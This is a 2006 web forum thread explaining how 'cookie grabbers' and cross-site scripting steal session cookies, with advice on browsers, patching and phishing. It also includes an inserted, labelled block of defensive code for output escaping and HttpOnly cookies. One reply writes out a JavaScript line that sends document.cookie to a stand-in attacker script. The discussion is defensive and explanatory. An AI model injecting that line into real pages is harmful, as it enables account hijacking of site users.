
View Full Version : Cookie Grabber



Zombihunter
08-04-2006, 05:29 AM
I have found this site to be very helpful in the past and am hoping the people on here can help me out with a few questions, since people here seem more knowledgeable about these types of things than I probably ever will.

To begin I am not looking for coding for one of these (cookie grabbers). I am just looking for some information about them. I have tried looking these things up on the internet, but keep getting sent to Neopets PetPages or places that just post the coding. I am looking for more detailed info about these things for two reasons. 1. to better protect my information from them and 2. basic curiosity of how things work.

Can someone explain exactly what these things can and cannot do? I know in basic it takes a copy of cookies from your computer and stores them else where, where the person using the cookie grabber, then can retrieve your personal information (account name, passwords, etc).

I would like to know things more specific like: Do you specify a specific website(s) that you want the cookies from or will it take them all? Does the CG have to be on the same domain as the cookie it's wanting to 'steal'? Do browsers like Firefox, IE, Safari, Opera protect from these being 'stolen', if so how other than constantly cleaning out your cookie? And what type of coding can these be written in (PHP, Java, CSS, etc)?

You don't have to go into technical jargon to explain; just basic layman's terms will work.

If anyone can answer this it would be much appreciated. Any information or even links to places I can find the information would be great.

I have read through the rules and I am pretty sure this isn't breaking any since I am just asking for this thing being described and not requesting the code for one.

jscheuer1
08-06-2006, 05:43 AM
I don't know much about this myself but, this article:

http://pcworld.about.com/magazine/2002p043id73828.htm

seems to imply what I suspected, that IE is the only vulnerable browser or at least the most vulnerable browser but that other MS software, if left unpatched, can also be vulnerable.

I would think if you regularly use live update or have automatic updates turned on and functioning properly, that this isn't much of a concern.

However, I would recommend to anyone concerned about this and the myriad other types of security risks associated with MS software, to avoid using these products as much as possible by using different software for anything that opens you to the web.

boogyman
08-06-2006, 06:30 AM
Okay, first of all... a cookie is a reference of a reference if done properly. There are many different ways of implementing a cookie, however they are usually done in a way that they are being processed in multiple ways. First the cookie is placed onto the computer from the website. It is then stored onto the computer for a certain length of time... if the programmer did not specify the length of time the default is the "session" or the length that you currently have that browser window open... Now the browser is supposed to check its "cookie jar" periodically and delete any expired cookies but that is getting off track.
After a cookie is placed onto a person's computer it can then be accessed and read by other programs if the program means to. The processing and security within the cookie is usually very minimal so programs that are purposefully attempting to read cookies will usually find that it's pretty simple. For that reason a GOOD programmer will not rely on the built-in security of the cookie and when they write the cookie they will not assign the actual physical details of what they are trying to store, but rather a reference number (id #) usually of where it can be found on the server. Yes, there are ways around this extra step, but if someone could get to this point, there really isn't much you are going to be able to do anyway besides block all content.

On that note, it is possible to prevent a cookie being written to your system without prompting you, or there is a setting that will only allow 3rd party cookies to be written on with a confirmation... As for protecting your computer, I wouldn't fully suggest that you disable your cookie allowance, however I would just monitor where you give out your sensitive information, and I have even gone as far as emailing the administrators of a website to ask them how cookies were stored and what security measures were put into place.


I hope everything works out for the best and feel free to continue to ask questions if anything I said didn't make sense

Twey
08-06-2006, 02:14 PM
Do you mean local programs that do this, or something on a website?

If the latter, what you're talking about is cross-site scripting (XSS). In an XSS attack, a malicious user inserts some Javascript into an innocent web page, which then has access to the cookies stored for that domain. This Javascript then transfers the cookie data to the malicious user's server. The simplest way to do this would be:
window.location.href = 'http://www.malloryssite.com/cookiestealer.php?' + document.cookie;
That PHP script could then store the cookies (which would likely contain some session identification) somewhere, or even use them automatically to hijack the user's currently-running session on the targeted website and thus take control of his/her account.

boogyman
08-06-2006, 08:20 PM
Yes, Twey, that is what I was referring to, however Zomb was asking about how to help him better understand the workings of cookies and that is what I was trying to do... If you need anything else zomb let us know

Twey
08-06-2006, 08:38 PM
Zomb was asking about how to help him better understand the workings of cookies
No, s/he was asking about the workings of "cookie grabbers," a vague term that could apply to a program, script or even a person. The question:
Does the CG have to be on the same domain as the cookie it's wanting to 'steal'?
led me to believe that XSS was what was being discussed here.
Do browsers like Firefox, IE, Safari, Opera protect from these being 'stolen', if so how other than constantly cleaning out your cookie?
No, browsers cannot protect you from XSS attacks. The responsibility is that of the site from which the page vulnerable to script insertion was served.
And what type of coding can these be written in (PHP, Java, CSS, etc)?
The server-side part can be written in almost any language. The client-side can be written in anything the browser will execute that can access cookies, including but not limited to Javascript, VBScript, Java, and Flash. Javascript is the most common by far, however, since almost all browsers support it and it is the easiest to inject, as it requires no external files.
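
An added example, not part of any post in this thread: the two site-side controls that address the theft described above, namely encoding user-supplied text on output and keeping only an opaque session reference in a cookie flagged HttpOnly. All function names and sample values are constructed for illustration, and scriptVisibleCookies is a simplified model of what a browser returns from document.cookie.

```javascript
// Added example: site-side defences against cookie theft through injected script.
// Every name and sample value below is constructed for illustration.

// 1. Output encoding: user-supplied text is rendered as text, never as markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderComment(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// 2. The cookie holds only an opaque server-side reference and is flagged
//    HttpOnly, so page script cannot read it.
function buildSessionCookie(sessionId) {
  if (!/^[A-Za-z0-9_-]{16,}$/.test(sessionId)) {
    throw new Error('unexpected session id format');
  }
  return `sid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Simplified model of document.cookie: name=value pairs of every cookie
// that was NOT set with the HttpOnly attribute.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((header) => header.split(';').map((part) => part.trim()))
    .filter(([, ...attrs]) => !attrs.some((a) => a.toLowerCase() === 'httponly'))
    .map(([pair]) => pair)
    .join('; ');
}

function demo() {
  const sampleSid = 'k3Jx9QmT2vLr8ZpW0aBc';                 // constructed value
  const hostileComment = '<script>/* injected */</script>'; // constructed input
  const headers = [buildSessionCookie(sampleSid), 'theme=dark; Path=/'];
  return {
    html: renderComment(hostileComment),     // script tag arrives as inert text
    visible: scriptVisibleCookies(headers),  // session cookie is absent
  };
}

console.log(demo());
```
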

djr33
08-06-2006, 10:34 PM
I have two domains, and would like cookies to be available for both. Is there any way I could use this to my advantage?
sorta off topic and going the opposite direction, but related...

Twey
08-06-2006, 11:22 PM
No, that's a completely different situation :)

The user would have to be logged in to both domains and on a page on each, as well as having JS enabled.

blm126
08-06-2006, 11:35 PM
or use an iframe to force them to be on both domains. Not reliable though as would require some javascript

jscheuer1
08-07-2006, 03:17 AM
I'd like to take this opportunity to bring this topic back into focus from my perspective for the OP:

1 ) Apparently all browsers are vulnerable to XSS cookie grabbing. Choose wisely those sites that you set up secure accounts with.

2 ) Equally apparent is that in unpatched editions of MS software, there are additional threats from direct assaults on your cookies. Protect yourself from these by using alternative software or ensuring that you always have the latest updates for your MS software.

3 ) There are vulnerabilities inherent in MS software other than direct cookie theft. It is a little like the little Dutch boy with his finger in the dike, only the dike is crumbling all around him. This isn't entirely MS's fault. It is mostly just that their software is the most widely used, and therefore also the most widely hacked. Most notable exception, Active X. This is a security nightmare of MS's own doing.

I would add to this:

4 ) Be on guard for phishing scams. Never use the link in an email that appears to be from a trusted site to update or give out any personal information. Always log on to the site itself using its known address before entering any passwords or updating or confirming information. Often if you carefully check the site address in such emails, it will become apparent that it isn't the site that the email claims to be from, simply a similar looking address.

Twey
08-07-2006, 04:11 AM
That pretty much sums it up, although I don't entirely agree with:
This isn't entirely MS's fault.
If Microsoft's software is only the most often cracked because it's the most popular, how do you explain the fact that Apache is by far the most popular webserver package -- and yet IIS is still the most frequently compromised?

Also, with regards to #4, Firefox 2.0 plans to implement some revolutionary new anti-phishing technology. Just how good it actually is remains to be seen -- I don't think it's been added to the version on the build tree yet.

blm126
08-07-2006, 04:24 AM
Also, with regards to #4, Firefox 2.0 plans to implement some revolutionary new anti-phishing technology. Just how good it actually is remains to be seen -- I don't think it's been added to the version on the build tree yet.
It might have been, or at least I remember reading a review somewhere. Though anti-phishing is a standard feature for quite a few newer browsers (e.g. IE7), which is always good.

Zombihunter
08-07-2006, 04:44 AM
That does help a lot. I have my mother on a mac so she's not using IE, she's using Safari and Firefox. I am more concerned with her computer than mine because my little brother plays Neopets, which is where I first heard about this thing when he called me asking me what one of those things actually were.

I was concerned about his NP account because he spends so much time on it, but more concerned about my mother's banking account and things like that. Why I asked if the coder had to specify the cookie it wanted or had to be on that domain. So all I really had to worry about was my little bro's account and not my mother's.

I do have them cleaning cookies before he goes near the site or any NP related site. I also have required him to go to sites that are largely 'known' and not questionable.

Being mainly a Commercial Artist, coding is something I do on the side so other coding I'm not much into, but I figured someone here would help me... So thanks for not letting me down. Also thanks for all the information.

Oh and it's she for those who were referring :)

jscheuer1
08-07-2006, 05:13 AM
If Microsoft's software is only the most often cracked because it's the most popular, how do you explain the fact that Apache is by far the most popular webserver package -- and yet IIS is still the most frequently compromised?

It's a love/hate relationship for most hackers. They love to hack MS because they hate them. :rolleyes: I didn't mean to imply that the MS software is the industry leader in all categories, just that its overall prominence and its (deserved I think) reputation for shoot from the hip business practices (something I didn't mention before) has made it a bit of a favorite target.

Twey
08-07-2006, 05:21 AM
For an XSS attack to take place, the site whose account of yours the attacker wishes to steal must be vulnerable. Let's face it, that's probably not going to happen on a bank website, which probably employs the best security experts around and keeps user interaction to a minimum possible for just such a reason :)
Of course, if you run an ActiveX control by clicking the little "yes" box when it asks permission, or IE is "persuaded" to run one without your knowledge, all the cookies from any site available can be taken. In fact, your entire computer can be taken over, keyloggers installed, all sorts of digital unpleasantries watching your every move.

Which is why you should avoid Internet Explorer. :)

He shouldn't be in too much trouble so long as he stays off IE (or at least disables ActiveX, although this includes more innocent components like XMLHttpRequest which could add functionality to a website) and doesn't download programs except from those trusted sites you mentioned. If possible, I'd advise you to use the Mac for any business or financial work where sensitive data is being handled.


I didn't mean to imply that the MS software is the industry leader in all categories
Oh no, I didn't mean to imply you did. According to Netcraft (http://news.netcraft.com/archives/web_server_survey.html), Apache has over twice the market share of IIS. Even factoring in the let's-all-kill-Microsoft aspect, statistically Apache should receive at least the same number of security hits. However, looking at data for Apache 2.0 (http://secunia.com/product/73/) and IIS5 (http://secunia.com/product/39/) (there isn't a lot of data on either IIS6 or Apache 2.2 yet; two holes for Apache, three for IIS) we can see that IIS has fewer actual advisories than Apache, a pretty sure sign that people haven't been searching for them so much, but also that what vulnerabilities were disclosed are considerably higher in criticality than those for Apache, which says to me, especially coupled with the relative lack of advisories, that either the security researchers got really lucky, or IIS is full of holes and the only reason so few were found is that most people were concentrating on Apache.

djr33
08-07-2006, 05:22 AM
Right. Ok, thanks.

Twey
08-07-2006, 05:38 AM
... huh?

That's a bit of a non-sequitur. Did you post in the right thread?

djr33
08-08-2006, 06:42 AM
Ha, sorry. I posted having not seen the next page, about the response to my question before.
Yes, non-sequitur. :p
Carry on....